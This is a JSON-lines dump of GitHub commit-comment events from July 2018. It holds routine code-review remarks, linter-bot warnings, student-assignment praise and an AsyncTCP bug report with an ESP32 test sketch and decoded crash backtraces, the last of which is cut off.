{"id":"8032493266","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869222,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T16:03:11Z","updated_at":"2018-07-28T16:03:11Z","author_association":"MEMBER","body":"@alexlamsl: so, will you enable 2FA on npm? That way we could go back to the review and publish procedure."}},"created_at":"2018-07-28T16:03:11Z"}
{"id":"8032495069","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"pmetoo38411/Lambda-Hello"},"payload":{"comment":{"id":29869227,"position":null,"line":null,"path":null,"commit_id":"13784db651b7eb297a2846b0774b3362d786d3e7","created_at":"2018-07-28T16:04:21Z","updated_at":"2018-07-28T16:04:21Z","author_association":"NONE","body":"Thanks for sharing, and great job! Also San Antonio is like the funnest place in the world."}},"created_at":"2018-07-28T16:04:21Z"}
{"id":"8032495301","type":"CommitCommentEvent","actor":{"login":"Zadezter"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29869228,"position":null,"line":null,"path":null,"commit_id":"c05cb289ce41b8f4edaa3dd665f1fab6c66cfe32","created_at":"2018-07-28T16:04:33Z","updated_at":"2018-07-28T16:04:33Z","author_association":"MEMBER","body":"This slime cannot bigger lol."}},"created_at":"2018-07-28T16:04:33Z"}
{"id":"8032496308","type":"CommitCommentEvent","actor":{"login":"jasoncoposky"},"repo":{"name":"irods/irods"},"payload":{"comment":{"id":29869237,"position":13,"line":14203,"path":"plugins/database/src/db_plugin.cpp","commit_id":"f540fe3082aca7b03e9d0196d1f8ed274683e905","created_at":"2018-07-28T16:05:14Z","updated_at":"2018-07-28T16:05:14Z","author_association":"MEMBER","body":"errors could be separated into SYS_INTERNAL_NULL_INPUT_ERR and SYS_INVALID_INPUT_PARAM should it be non-null and empty."}},"created_at":"2018-07-28T16:05:14Z"}
{"id":"8032497098","type":"CommitCommentEvent","actor":{"login":"LraiZer"},"repo":{"name":"oe-alliance/AutoBouquetsMaker"},"payload":{"comment":{"id":29869240,"position":null,"line":null,"path":null,"commit_id":"b0d064606c0d38f879ab9aeed5cd0747421969a4","created_at":"2018-07-28T16:05:47Z","updated_at":"2018-07-28T16:05:47Z","author_association":"NONE","body":"You may also wish to look closer at oe-alliance CrossEPG to apply same patch?\r\nHere could also raise an issue when building with oe-alliance-core nextp3 branch.\r\nhttps://github.com/oe-alliance/e2openplugin-CrossEPG/blob/master/src/common/dvb/dvb.c#L17-L19"}},"created_at":"2018-07-28T16:05:47Z"}
{"id":"8032499612","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29869248,"position":14,"line":572,"path":"lib/_stream_writable.js","commit_id":"ce83099d3e6f6d7be0e533c19cd7f905bba4ea2a","created_at":"2018-07-28T16:07:35Z","updated_at":"2018-07-28T16:07:35Z","author_association":"MEMBER","body":"That as always be the case, unfortunately."}},"created_at":"2018-07-28T16:07:35Z"}
{"id":"8032500159","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/crispy-memory"},"payload":{"comment":{"id":29869250,"position":1,"line":1,"path":"README.md","commit_id":"4a3a8af9653996022d33796692aec977f633e201","created_at":"2018-07-28T16:07:56Z","updated_at":"2018-07-28T16:07:56Z","author_association":"OWNER","body":"First-timer"}},"created_at":"2018-07-28T16:07:56Z"}
{"id":"8032501835","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"willieino/Lambda-Hello"},"payload":{"comment":{"id":29869252,"position":null,"line":null,"path":null,"commit_id":"cbe70a7b25047942ceb02f97836152893a160b25","created_at":"2018-07-28T16:09:10Z","updated_at":"2018-07-28T16:09:10Z","author_association":"NONE","body":"Great job on the assignment and stretch, William!"}},"created_at":"2018-07-28T16:09:10Z"}
{"id":"8032502998","type":"CommitCommentEvent","actor":{"login":"Cutthroat1"},"repo":{"name":"Cutthroat1/crispy-memory"},"payload":{"comment":{"id":29869255,"position":1,"line":1,"path":"README.md","commit_id":"4a3a8af9653996022d33796692aec977f633e201","created_at":"2018-07-28T16:10:05Z","updated_at":"2018-07-28T16:10:05Z","author_association":"OWNER","body":"Myself learning to code"}},"created_at":"2018-07-28T16:10:05Z"}
{"id":"8032503649","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"griffinshuth/Lambda-Hello"},"payload":{"comment":{"id":29869266,"position":5,"line":5,"path":"GriffinH.txt","commit_id":"cfcdd75e6d39334ed3dfb43a26d070164af21565","created_at":"2018-07-28T16:10:30Z","updated_at":"2018-07-28T16:10:30Z","author_association":"NONE","body":"That's a cute story, thanks for completing this assignment."}},"created_at":"2018-07-28T16:10:30Z"}
{"id":"8032504826","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"griffinshuth/Lambda-Hello"},"payload":{"comment":{"id":29869267,"position":9,"line":5,"path":"GriffinH.txt","commit_id":"d08c812483438e6b813fa313881d46860e759923","created_at":"2018-07-28T16:11:18Z","updated_at":"2018-07-28T16:11:18Z","author_association":"NONE","body":"Great job on the stretch!"}},"created_at":"2018-07-28T16:11:18Z"}
{"id":"8032505887","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioBase"},"payload":{"comment":{"id":29869269,"position":null,"line":null,"path":null,"commit_id":"ac8760d358486dd9ed40db5ffe6fc2af17af701c","created_at":"2018-07-28T16:12:03Z","updated_at":"2018-07-28T16:12:03Z","author_association":"NONE","body":"[tests/testthat/test_plot_heatmap_functions.R:43:52:](https://github.com/hbc/bcbioBase/blob/ac8760d358486dd9ed40db5ffe6fc2af17af701c/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                 ~~^\n```\n[tests/testthat/test_plot_heatmap_functions.R:43:73:](https://github.com/hbc/bcbioBase/blob/ac8760d358486dd9ed40db5ffe6fc2af17af701c/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                                     ~~~^\n```"}},"created_at":"2018-07-28T16:12:03Z"}
{"id":"8032505921","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29869270,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-28T16:12:05Z","updated_at":"2018-07-28T16:12:05Z","author_association":"MEMBER","body":"No, I bumped it manually in a later commit."}},"created_at":"2018-07-28T16:12:05Z"}
{"id":"8032506113","type":"CommitCommentEvent","actor":{"login":"MarkSummerville"},"repo":{"name":"Chlorel/tvrename"},"payload":{"comment":{"id":29869271,"position":null,"line":null,"path":null,"commit_id":"87af2caaa43cc330f515421e697a0c038f9bda40","created_at":"2018-07-28T16:12:14Z","updated_at":"2018-07-28T16:12:14Z","author_association":"NONE","body":"Hey,\r\n\r\nI added a similar change via https://github.com/TV-Rename/tvrename/commit/e4956c8227f5b9bb0e19a00cb16b605edf6d7055\r\n\r\nHope that's OK?"}},"created_at":"2018-07-28T16:12:14Z"}
{"id":"8032506872","type":"CommitCommentEvent","actor":{"login":"waddlesplash"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29869274,"position":27,"line":123,"path":"x11-libs/libxcb/libxcb-1.13.recipe","commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-28T16:12:47Z","updated_at":"2018-07-28T16:12:47Z","author_association":"MEMBER","body":"Policy errors are only for built libraries, not devel packages. If nothing can be built against this library without these devel packages, then they should be in devel."}},"created_at":"2018-07-28T16:12:47Z"}
{"id":"8032507967","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/MatomoAnalytics"},"payload":{"comment":{"id":29869279,"position":null,"line":null,"path":null,"commit_id":"e9a72618f433ccb73add01f96077dd32efbc36d7","created_at":"2018-07-28T16:13:37Z","updated_at":"2018-07-28T16:13:37Z","author_association":"MEMBER","body":"How is this 3rd party friendly?"}},"created_at":"2018-07-28T16:13:37Z"}
{"id":"8032510496","type":"CommitCommentEvent","actor":{"login":"ThomasWaldmann"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29869291,"position":52,"line":1571,"path":"Lib/logging/__init__.py","commit_id":"78c18a9b9a1445f7c755929917a790ba02b4a5e0","created_at":"2018-07-28T16:15:23Z","updated_at":"2018-07-28T16:15:23Z","author_association":"NONE","body":"I reverted this and it makes the borgbackup tests work again on python 3.7.\r\n\r\nOur tests check if some expected strings are in logging output and with (unmodified) py37, these checks fail for stuff emitted at INFO level (not present in output). With py36, the tests work.\r\n\r\nhttps://github.com/borgbackup/borg/issues/3805"}},"created_at":"2018-07-28T16:15:23Z"}
{"id":"8032511107","type":"CommitCommentEvent","actor":{"login":"mcallegari"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29869292,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-28T16:15:50Z","updated_at":"2018-07-28T16:15:50Z","author_association":"OWNER","body":"Ah, interesting. I always thought the internals worked with floats, since QML accepts only floats.\r\nBut OK, I'll change it but I doubt that's the key point that can compromise the 3D preview frame rate :)"}},"created_at":"2018-07-28T16:15:50Z"}
{"id":"8032511927","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"miraheze/MatomoAnalytics"},"payload":{"comment":{"id":29869294,"position":null,"line":null,"path":null,"commit_id":"e9a72618f433ccb73add01f96077dd32efbc36d7","created_at":"2018-07-28T16:16:25Z","updated_at":"2018-07-28T16:16:25Z","author_association":"MEMBER","body":"Done."}},"created_at":"2018-07-28T16:16:25Z"}
{"id":"8032512627","type":"CommitCommentEvent","actor":{"login":"madmar76"},"repo":{"name":"github/platform-samples"},"payload":{"comment":{"id":29869298,"position":2,"line":7,"path":"api/ruby/building-your-first-github-app/server.rb","commit_id":"f9710ad34749085f95cbdee47fc7efd3c8242a02","created_at":"2018-07-28T16:16:56Z","updated_at":"2018-07-28T16:16:56Z","author_association":"NONE","body":"22q"}},"created_at":"2018-07-28T16:16:56Z"}
{"id":"8032517411","type":"CommitCommentEvent","actor":{"login":"ShardeDeLane"},"repo":{"name":"ShardeDeLane/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29869308,"position":27,"line":25,"path":"README.md","commit_id":"50693e4e90f7477ede546b3c8e69e4a1b69689c3","created_at":"2018-07-28T16:20:08Z","updated_at":"2018-07-28T16:20:08Z","author_association":"OWNER","body":"Semantic elements are tags that make sense to the documentation based on the project such as using a nav for a navbar, article for text that is usually like a weblog or units of content, while sections are used as their name implies to section areas usually having an h1 - h6 heading along with their content."}},"created_at":"2018-07-28T16:20:08Z"}
{"id":"8032517533","type":"CommitCommentEvent","actor":{"login":"drewsauce"},"repo":{"name":"cpscc/wiki"},"payload":{"comment":{"id":29869309,"position":null,"line":null,"path":null,"commit_id":"5072dd36def0539487e0146c73e4aaebfdbfeaef","created_at":"2018-07-28T16:20:12Z","updated_at":"2018-07-28T16:20:12Z","author_association":"CONTRIBUTOR","body":"Oh, but will I?"}},"created_at":"2018-07-28T16:20:12Z"}
{"id":"8032517827","type":"CommitCommentEvent","actor":{"login":"nzmora"},"repo":{"name":"jacobgil/pytorch-tensor-decompositions"},"payload":{"comment":{"id":29869312,"position":null,"line":null,"path":null,"commit_id":"16177775fe17267be41f43a8d96368c826970e99","created_at":"2018-07-28T16:20:23Z","updated_at":"2018-07-28T16:20:23Z","author_association":"NONE","body":"Cool - thanks!\r\nI'm currently on a long vacation so I'll get back to \"things\" when I return."}},"created_at":"2018-07-28T16:20:23Z"}
{"id":"8032530194","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29869348,"position":null,"line":null,"path":null,"commit_id":"c0e6fc3602f35e44b3b4165054f63c99df9910d4","created_at":"2018-07-28T16:29:26Z","updated_at":"2018-07-28T16:29:26Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T16:29:26Z"}
{"id":"8032530793","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioBase"},"payload":{"comment":{"id":29869352,"position":null,"line":null,"path":null,"commit_id":"a5c45c9f7209e6fdb45098a3ca31b3ad96320080","created_at":"2018-07-28T16:29:54Z","updated_at":"2018-07-28T16:29:54Z","author_association":"NONE","body":"[tests/testthat/test_plot_heatmap_functions.R:43:52:](https://github.com/hbc/bcbioBase/blob/a5c45c9f7209e6fdb45098a3ca31b3ad96320080/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                 ~~^\n```\n[tests/testthat/test_plot_heatmap_functions.R:43:73:](https://github.com/hbc/bcbioBase/blob/a5c45c9f7209e6fdb45098a3ca31b3ad96320080/tests/testthat/test_plot_heatmap_functions.R#L43) *style:* **Integers should not be implicit. Use the form 1L for integers or 1.0 for doubles.**\n```r\n​        color <- colorRampPalette(brewer.pal(n = 11, name = \"PuOr\"))(256)\n                                                                     ~~~^\n```"}},"created_at":"2018-07-28T16:29:54Z"}
{"id":"8032531971","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioRNASeq"},"payload":{"comment":{"id":29869360,"position":null,"line":null,"path":null,"commit_id":"4410887e8b7a12d25078a616ff44b6df96947e28","created_at":"2018-07-28T16:30:43Z","updated_at":"2018-07-28T16:30:43Z","author_association":"NONE","body":"[R/AllClasses.R:1:1:](https://github.com/hbc/bcbioRNASeq/blob/4410887e8b7a12d25078a616ff44b6df96947e28/R/AllClasses.R#L1) *style:* **TODO comments should be removed.**\n```r\n​# TODO Inform the user about loading counts at gene or transcript level\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/AllClasses.R:2:1:](https://github.com/hbc/bcbioRNASeq/blob/4410887e8b7a12d25078a616ff44b6df96947e28/R/AllClasses.R#L2) *style:* **TODO comments should be removed.**\n```r\n​# TODO Reduce the message spam about project-summary.yaml in the load call\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/AllClasses.R:3:1:](https://github.com/hbc/bcbioRNASeq/blob/4410887e8b7a12d25078a616ff44b6df96947e28/R/AllClasses.R#L3) *style:* **TODO comments should be removed.**\n```r\n​# TODO Inform the user that we're using featureCounts for STAR, HISAT2\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/AllClasses.R:97:1:](https://github.com/hbc/bcbioRNASeq/blob/4410887e8b7a12d25078a616ff44b6df96947e28/R/AllClasses.R#L97) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'   - \"`sailfish`\". [Sailfish](http://www.cs.cmu.edu/~ckingsf/software/sailfish)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T16:30:43Z"}
{"id":"8032532277","type":"CommitCommentEvent","actor":{"login":"Thunder33345"},"repo":{"name":"Aenteritas/MineUChat"},"payload":{"comment":{"id":29869361,"position":null,"line":null,"path":null,"commit_id":"ecb8b614f4a2428053600edcb372e24133301585","created_at":"2018-07-28T16:30:55Z","updated_at":"2018-07-28T16:30:55Z","author_association":"NONE","body":"Dear @Aenteritas:\nI regret to inform you that the release you submitted, named \"**MineUChat**\" (v1.0.0-BETA), for the project [MineUChat](https://poggit.pmmp.io/ci/Aenteritas/MineUChat/MineUChat) on 2018-07-27T12:30:42.000Z, has been rejected.\n\nThe namespace isnt PQRS compliant\n\nand some questionable logic https://github.com/Aenteritas/MineUChat/blob/ecb8b614f4a2428053600edcb372e24133301585/src/Test/Main.php#L40-L46\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-28T16:30:55Z"}
{"id":"8032535626","type":"CommitCommentEvent","actor":{"login":"iafilius"},"repo":{"name":"me-no-dev/AsyncTCP"},"payload":{"comment":{"id":29869366,"position":null,"line":null,"path":null,"commit_id":"2f76a9f5b6bedd60198074ebcd69fe36c41d4cba","created_at":"2018-07-28T16:33:19Z","updated_at":"2018-07-28T16:33:19Z","author_association":"NONE","body":"Hi, just tried this fix as i experience some crashes, which looks all related to closing the tcp session (i guess similar as mentioned  in issue #14 )\r\nUsing latest arduino/libraries and expresif core available to date.\r\n\r\nUsing the minimalistic code posted on : \r\nhttps://github.com/me-no-dev/ESPAsyncWebServer/issues/324\r\n\r\n#include <Arduino.h>\r\n#ifdef ESP32\r\n#include <WiFi.h>\r\n#else\r\n#include <ESP8266WiFi.h>\r\n#endif\r\n\r\n#include <ESPAsyncWebServer.h>\r\n\r\nAsyncWebServer server( 80 );\r\nconst char* ssid = \"EPS32\";\r\nconst char* password = \"0123456789\";\r\n\r\nint counter;\r\nvoid handleFile( AsyncWebServerRequest *request, bool isPage ) \r\n{\r\n  if ( isPage )\r\n  {\r\n    request->send( 200, \"text/html\", \"<meta http-equiv=\\\"refresh\\\" content=\\\"0.001; URL = dashboard.html\\\"><link rel=\\\"stylesheet\\\" href=\\\"/style1.css\\\"><link rel=\\\"stylesheet\\\" href=\\\"/style2.css\\\"><link rel=\\\"stylesheet\\\" href=\\\"/style3.css\\\"><link rel=\\\"stylesheet\\\" href=\\\"/style4.css\\\"><link rel=\\\"stylesheet\\\" href=\\\"/style5.css\\\">\" );//request->send( SD, fileName );\r\n    Serial.println( counter++ );\r\n  }\r\n  else\r\n    request->send( 200, \"text/css\", \"Some css text Some css text Some css text Some css text Some css text Some css text Some css text Some css text Some css text Some css text Some css text Some css textSome css text Some css text Some css text Some css text Some css text Some css textSome css text Some css text Some css text Some css text Some css text Some css textSome css text Some css text Some css text Some css text Some css text Some css text\" );\r\n}\r\n\r\nvoid setup()\r\n{\r\n  Serial.begin( 115200 );\r\n  //WiFi.begin( ssid, password );\r\n  WiFi.softAP( ssid, password);\r\n\r\n  delay( 500 );\r\n/*\r\n  while ( WiFi.status() != WL_CONNECTED ) \r\n  {\r\n    delay( 500 );\r\n    Serial.print( \".\" );\r\n  }\r\n  Serial.println( \"Connected\" );\r\n*/\r\n  server.on( \"/dashboard.html\", []( AsyncWebServerRequest *request ) {handleFile(request, true ); } );\r\n  server.on( \"/style1.css\", []( AsyncWebServerRequest *request ) {  handleFile( request, false ); } );\r\n  server.on( \"/style2.css\", []( AsyncWebServerRequest *request ) {  handleFile( request, false ); } );\r\n  server.on( \"/style3.css\", []( AsyncWebServerRequest *request ) {  handleFile( request, false ); } );\r\n  server.on( \"/style4.css\", []( AsyncWebServerRequest *request ) {  handleFile( request, false ); } );\r\n  server.on( \"/style5.css\", []( AsyncWebServerRequest *request ) {  handleFile( request, false ); } );\r\n  server.begin();\r\n}\r\n\r\nvoid loop()\r\n{\r\n}\r\n\r\nWith that I can reproduce the crashes in a few seconds, a collection of dumps and decoded information below, in the hope it helps solving the  crashes:\r\n\r\n\r\ndump:\r\nassertion \"heap != NULL && \"free() target pointer is outside heap areas\"\" failed: file \"/Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c\", line 261, function: heap_caps_free\r\nabort() was called at PC 0x400db793 on core 1\r\n\r\nBacktrace: 0x4008d950:0x3ffdc9a0 0x4008db2b:0x3ffdc9c0 0x400db793:0x3ffdc9e0 0x40083eef:0x3ffdca10 0x40085da1:0x3ffdca30 0x4000bec7:0x3ffdca50 0x400f1881:0x3ffdca70 0x400f1943:0x3ffdca90 0x400d5cca:0x3ffdcab0 0x400d5fa9:0x3ffdcaf0 0x400d601b:0x3ffdcb20\r\n\r\n\r\ndecode:\r\nDecoding stack results\r\n0x4008d950: invoke_abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 139\r\n0x4008db2b: abort at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/esp32/./panic.c line 148\r\n0x400db793: __assert_func at ../../../.././newlib/libc/stdlib/assert.c line 63\r\n0x40083eef: heap_caps_free at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/heap/./heap_caps.c line 261\r\n0x40085da1: _free_r at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/newlib/./syscalls.c line 42\r\n0x400f1881: tcp_close_shutdown at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 225\r\n0x400f1943: tcp_close at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 305\r\n0x400d5cca: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 463\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n----------------------\r\n\r\ndump:\r\nGuru Meditation Error: Core  1 panic'ed (StoreProhibited)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x40131763  PS      : 0x00060130  A0      : 0x800d5ca5  A1      : 0x3ffdd1a0  \r\nA2      : 0x00440018  A3      : 0x00000000  A4      : 0x00060120  A5      : 0x3ffdd240  \r\nA6      : 0x3ffde100  A7      : 0x00000000  A8      : 0x00000000  A9      : 0x3ffdd1b0  \r\nA10     : 0x3ffc96d0  A11     : 0x3ffde0d0  A12     : 0x39c00000  A13     : 0x3ffe288c  \r\nA14     : 0x00000000  A15     : 0x00000001  SAR     : 0x0000000a  EXCCAUSE: 0x0000001d  \r\nEXCVADDR: 0x00440048  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x40131763:0x3ffdd1a0 0x400d5ca2:0x3ffdd1c0 0x400d5fa9:0x3ffdd200 0x400d601b:0x3ffdd230\r\n\r\n\r\ndecode:\r\nPC: 0x40131763: tcp_arg at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 1652\r\nEXCVADDR: 0x00440048\r\n\r\nDecoding stack results\r\n0x40131763: tcp_arg at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 1652\r\n0x400d5ca2: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 457\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n-----------------\r\ndump:\r\nGuru Meditation Error: Core  1 panic'ed (StoreProhibited)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x40131763  PS      : 0x00060f30  A0      : 0x800d5ca5  A1      : 0x3ffdca70  \r\nA2      : 0xabba1234  A3      : 0x00000000  A4      : 0x00060f20  A5      : 0x3ffdcb10  \r\nA6      : 0x3ffe1570  A7      : 0x00000000  A8      : 0x00000000  A9      : 0x3ffdca80  \r\nA10     : 0x3ffe0440  A11     : 0x3ffe1540  A12     : 0x22000000  A13     : 0x3ffe1320  \r\nA14     : 0x00000000  A15     : 0x00000001  SAR     : 0x0000000a  EXCCAUSE: 0x0000001d  \r\nEXCVADDR: 0xabba1264  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x40131763:0x3ffdca70 0x400d5ca2:0x3ffdca90 0x400d5fa9:0x3ffdcad0 0x400d601b:0x3ffdcb00\r\n\r\n\r\n\r\ndecode:\r\nPC: 0x40131763: tcp_arg at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 1652\r\nEXCVADDR: 0xabba1264\r\n\r\nDecoding stack results\r\n0x40131763: tcp_arg at /Users/ficeto/Desktop/ESP32/ESP32/esp-idf-public/components/lwip/core/tcp.c line 1652\r\n0x400d5ca2: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 457\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 550\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n-------------------------------\r\ndump:\r\nGuru Meditation Error: Core  1 panic'ed (InstrFetchProhibited)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x00000000  PS      : 0x00060b30  A0      : 0x800d601e  A1      : 0x3ffdcd40  \r\nA2      : 0x3ffde5d8  A3      : 0x00000000  A4      : 0x3ffdab04  A5      : 0x00000000  \r\nA6      : 0x3ffdab50  A7      : 0x00000000  A8      : 0x800d5f88  A9      : 0xabba1234  \r\nA10     : 0x3ffde654  A11     : 0x3ffdcd44  A12     : 0x3ffdcd48  A13     : 0x3ffdcd4c  \r\nA14     : 0x3ffdcd4c  A15     : 0x3ffdae20  SAR     : 0x0000000a  EXCCAUSE: 0x00000014  \r\nEXCVADDR: 0x00000000  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x00000000:0x3ffdcd40 0x400d601b:0x3ffdcd70\r\n\r\n\r\ndecode:\r\nPC: 0x00000000\r\nEXCVADDR: 0x00000000\r\n\r\nDecoding stack results\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n\r\n------------------------------------\r\n\r\ndump:\r\nGuru Meditation Error: Core  1 panic'ed (InstrFetchProhibited)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x303d713b  PS      : 0x00060730  A0      : 0x800d5fc5  A1      : 0x3ffdd1d0  \r\nA2      : 0x3ffdf3d8  A3      : 0x0000312e  A4      : 0x3ffdf348  A5      : 0x3ffdd208  \r\nA6      : 0x3ffdd20c  A7      : 0xbaad5678  A8      : 0x800d5c91  A9      : 0x3ffdd1c0  \r\nA10     : 0x3ffdf3d8  A11     : 0x3ffdd1dc  A12     : 0x3ffdd1d8  A13     : 0x00000000  \r\nA14     : 0x3ffdebf8  A15     : 0x00000000  SAR     : 0x0000000a  EXCCAUSE: 0x00000014  \r\nEXCVADDR: 0x303d7138  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x303d713b:0x3ffdd1d0 0x400d5fc2:0x3ffdd200 0x400d601b:0x3ffdd230\r\n\r\n\r\ndecode:\r\n\r\nPC: 0x303d713b\r\nEXCVADDR: 0x303d7138\r\n\r\nDecoding stack results\r\n0x400d5fc2: AsyncClient::_poll(tcp_pcb*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 555\r\n0x400d601b: _async_service_task(void*) at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 886\r\n\r\n\r\n---------------------------------------\r\nGuru Meditation Error: Core  1 panic'ed (IllegalInstruction)\r\n. Exception was unhandled.\r\nCore 1 register dump:\r\nPC      : 0x6f532074  PS      : 0x00060f30  A0      : 0x800d5d05  A1      : 0x3ffdca60  \r\nA2      : 0x3ffdd124  A3      : 0x6320656d  A4      : 0x3ffdd10c  A5      : 0x3ffdcb10  \r\nA6      : 0x3ffe0564  A7      : 0x00000000  A8      : 0x800d5c91  A9      : 0x3ffdca50  \r\nA10     : 0x3ffdd124  A11     : 0x3ffdca6c  A12     : 0x3ffdca68  A13     : 0x3ffdeae8  \r\nA14     : 0x00000000  A15     : 0x00000001  SAR     : 0x0000000a  EXCCAUSE: 0x00000000  \r\nEXCVADDR: 0x00000000  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff  \r\n\r\nBacktrace: 0x6f532074:0x3ffdca60 0x400d5d02:0x3ffdca90 0x400d5fa9:0x3ffdcad0 0x400d601b:0x3ffdcb00\r\n\r\n\r\ndecode:\r\nPC: 0x6f532074\r\nEXCVADDR: 0x00000000\r\n\r\nDecoding stack results\r\n0x400d5d02: AsyncClient::_close() at C:\\Users\\m99i941\\Arduino\\libraries\\AsyncTCP-master\\src\\AsyncTCP.cpp line 472\r\n0x400d5fa9: AsyncClient::_poll(tcp_pcb*) at 